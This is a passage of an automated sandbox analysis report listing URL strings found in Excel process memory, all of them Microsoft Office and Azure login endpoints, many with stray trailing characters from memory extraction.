      Source: EXCEL.EXE, 00000000.00000003.673657155.0000000012AEF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673947140.0000000012AF1000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: EXCEL.EXE, 00000000.00000003.673657155.0000000012AEF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673947140.0000000012AF1000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
      Source: EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtm
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebooke
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: EXCEL.EXE, 00000000.00000003.673657155.0000000012AEF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673947140.0000000012AF1000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: EXCEL.EXE, 00000000.00000003.673657155.0000000012AEF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673947140.0000000012AF1000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrivep
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: EXCEL.EXE, 00000000.00000003.673657155.0000000012AEF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673947140.0000000012AF1000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech5
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechf
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.com4
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmpString found in binary or memory: https://login.window?
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://login.windows.local
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize8
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/commL
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oaut
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize2
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize5
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeA
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeC
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeD
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeG
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeI
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeV
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeW
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize_
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizea
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeb
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizec
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizee
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizef
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizes
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesvS
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizev
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizew
